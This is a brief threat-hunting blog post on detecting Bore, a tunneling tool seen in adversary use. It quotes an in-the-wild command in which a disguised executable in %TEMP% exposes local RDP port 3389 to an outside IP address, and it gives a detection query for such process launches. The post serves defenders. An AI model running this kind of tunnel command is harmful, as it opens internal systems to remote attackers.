066. Detecting Bore - Another Tunneling Tool in Adversary's Kit
Hello everyone! Tunneling tools - they are everywhere! Today we'll look at another example observed in-the-wild - Bore.
It's a CLI tool that exposes local ports to a remote server. Want an example? Sure, here you go:
"%TEMP%\svhos.exe" local 3389 --to 91.202.233[.]238
Third-rate masquarading, right? I think you noticed interesting command line parameters we can use for building detections. Here's an example:
event_type: "processcreate"
AND
cmdline.keyword: /.* local .*/
AND
cmdline: (("3389" OR "22") AND "to")
Of course, you can experiment with port numbers and exclusions!
See you tomorrow!
Comments
Post a Comment